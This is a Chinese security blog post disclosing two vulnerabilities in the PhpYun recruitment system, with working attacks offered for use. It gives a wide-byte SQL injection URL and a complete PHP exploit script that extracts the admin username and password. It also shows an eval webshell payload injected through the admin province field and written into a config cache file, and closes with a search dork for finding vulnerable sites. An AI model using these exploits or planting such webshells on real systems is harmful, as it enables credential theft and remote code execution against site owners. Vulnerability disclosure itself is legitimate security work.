|
PhpYun人才系统是php业界著名门户网站php100重磅推出的一套开源人才系统,因php100在业界的地位而迅速被站长选用,但毕竟是新生事物,其代码在安全性上存在严重安全问题。
1.宽字节注入
漏洞描述
系统在config/db.safety.php中定义如下代码:
function quotesGPC() {
$_POST = array_map("addSlash", $_POST);
$_GET = array_map("addSlash", $_GET);
$_COOKIE = array_map("addSlash", $_COOKIE);
}
function addSlash($el) {
if (is_array($el))
return array_map("addSlash", $el);
else
return addslashes($el);
}
这段代码强制对变量进行了gpc转换,以增加安全性,但是令人费解的是这段代码根本没有在系统中调用,导致php在gpc关闭的情况下,可以直接对系统进行注入。由于一般php的gpc是默认开启,系统的所有查询变量在sql语句中均有单引号包围,并对inti型变量进行了强制转换,所以稍微显得有点鸡肋。
但由于整套系统采用gbk编码,而且没有做相应的字符过滤,在大部分地方导致宽字节注入。
如下代码:
if(isset($_GET[search])){
....省略部分无关代码 //公司类型
$where=!empty($_GET[exp])? "and a.`exp`='$_GET[exp]' ":null; //公司类型
$where.=!empty($_GET[edu])? "and a.`edu`='$_GET[edu]' ":null; //学历
$where.=!empty($_GET[salary])? "and a.`salary`='$_GET[salary]' ":null; //月薪
$where.=$_GET[keyword]!="关键字"? "and a.`name` like '%$_GET[keyword]%' ":null; //关键字
.....省略部分无关代码
$select="a.`id`,a.`uid`,a.`name` as `jobname`,a.`number`,b.`name`,a.`provinceid` as `jobcity`,a.`lastupdate`,a.`salary`,a.`description`,a.`edu`,b.`pr`,b.`mun`";
$searchsql=$obj->DB_select_alls("company_job","company","1 $where order by `lastupdate` desc limit $firstcount,$displaypg",$select)
变量没有进行任何验证即带入查询语句,在gpc开启的情况下用%df'作为keywords查询即可闭合sql查询的单引号实现注入,爆出账号和密码。
利用方式:
精心构造注入语句
http://www.hackqing.cn/search.php?keyword=php%df%27%20or%201=2%20union%20select%201,2,concat(0x40,0x23,username,0x7e,password,0x23,0x40),4,5,6,7,8,9,0,11,12%20from%20phpyun_admin_user--%20sdfsd&provinceid=&mySearchCityName=&mySearchCity=&search=%CB%D1%CB%F7,
即可注入出后台账号和密码。
附上exp:
<?php
/*
* Php Yun 人才系统宽字节编码注入exp
**/
print_r('
+--------------------------------------------------------------------+
PhpYun RenCai System Remove SQL Injection Exploit
By l4yn3
Blog http://hi.baidu.com/l4yn3
+--------------------------------------------------------------------+
');
if($argc < 2)
{
print_r('
+-----------------------------------------------------------------+
Example:
php '.$argv[0].' localhost
+-----------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
echo "Waiting, exploiting......\r\n";
$data = Hacking();
preg_match("/@#(\S+)#@/isU", $data, $note);
if(!isset($note[1]) || empty($note[1]))
{
exit('Exploit failed!');
exit;
}
else
{
$res_arr = explode('~', $note[1]);
print("
Exploit successed!\r\n
Name:".$res_arr[0]."\r\n
PassWord:".$res_arr[1]."\r\n
Good Luck to you!
----l4yn3
");
exit;
}
function Hacking()
{
global $host, $path;
$data = "GET /search.php?keyword=php%df%27%20or%201=2%20union%20select%201,2,concat(0x40,0x23,username,0x7e,password,0x23,0x40),4,5,6,7,8,9,0,11,12%20from%20phpyun_admin_user--%20sdfsd&provinceid=&mySearchCityName=&mySearchCity=&search=%CB%D1%CB%F7 HTTP/1.1\r\n"; ////@#
$data .= "Host: $host\r\n";
$data .= "Connection: Close\r\n\r\n";
$fp = fsockopen($host, 80);
fputs($fp, $data);
$res = '';
while($fp && !feof($fp))
{
$res .= fread($fp, 1024);
}
fclose($fp);
return $res;
}
2.后台代码执行
漏洞描述
系统对相关配置信息的处理流程为 配置信息入库->从库中取出配置信息写入文件,当做文件缓存使用,导致典型的二次攻击。
看以下代码:
admin/admin_city.php
if($_POST[madeprovince]){
if(!empty($_POST[provinceid])){
$value="`name`='".$_POST[provinceid]."',`keyid`='0',`sort`='0'";
$city1=$acts->DB_insert_once("calss_city","$value"); //没做任何过滤,直接插入 ---l4yn3
!empty($city1)?$acts->get_admin_msg("admin_city.php","添加成功"):$acts->get_admin_msg("admin_city.php","添加失败,请销后再试");
}else{
$acts->get_admin_msg("admin_city.php","请正确填写你要添加的城市");
}
}
admin/admin_make.php
if($_GET[make]=='area'){
$data .= "<?php \n \$data_area=array(";
foreach($acts->DB_select_all("calss_city") as $v){
$data .="'$v[0]'=>'$v[1]',\n";
}
$data .= "'1983223'=>'PHP100'); \n ?>";
$returnif=true; //从库里取出配置信息 l4yn3
}
............... 省略部分代码
if(!empty($data) && $returnif){
$open=fopen(CONFIG_PATH.'db.data.'.$_GET[make].'.php','w+');
$fw=fwrite($open,$data); //没做任何处理,直接写入配置文件,典型的二次攻击
fclose($open);
if(!empty($fw)){
$acts->get_admin_msg("admin_job.php","更新成功!");
}
}
添加省份信息的代码没有任何过滤直接插入数据库(肯定注入了),然后再另外一个文件里直接把配置信息取出来写入缓存文件,导致典型的二次注入攻击。
我们看一下配置文件的格式。
<?php
$data_area=array('1'=>'北京',
'2'=>'上海',
'3'=>'天津',
'4'=>'重庆',
'5'=>'河北');
及时gpc转换开启,我们添加的时候被转义,但是存到库里也就是干净的了,在取出来写入缓存,造成典型的二次攻击。我们从数据库里面读出来的省份为'.@eval($_REQUEST['cmd']).'123,那写入配置文件后就变成了'495'=>''.@eval($_REQUEST['cmd']).'123',,成功闭合数组的单引号,执行我们的php代码。
而插入的内容又是我们控制的。
利用方法
在‘地区配置’处添加一级城市名称。如果gpc转换关闭,那我们需要添加为\'.@eval($_REQUEST[\'cmd\']).\'123,我们要对我们添加的单引号进行模拟转义,这样添加到库里才能成为'.@eval($_REQUEST['cmd']).'123,然后被写入执行,避免添加失败的错误。如果gpc开启则直接添加 '.@eval($_REQUEST['cmd']).'123,因为gpc已经给我们转义好了。所以流程是先添加'.@eval($_REQUEST['cmd']).'123,提示失败,则说明gpc关闭了,sql没有正常执行,那再重新添加\'.@eval($_REQUEST[\'cmd\']).\'123,对单引号进行转义,添加成功。然后手动访问admin/admin_malke.php?make=area,提示成功生成配置文件,然后用客户端文件/config/db.data.area.php,就是我们的一句话。
查找关键词:Powered by PHPYun.
注:首发l4yn3,由情整理编辑
|
推荐
评论(0条)
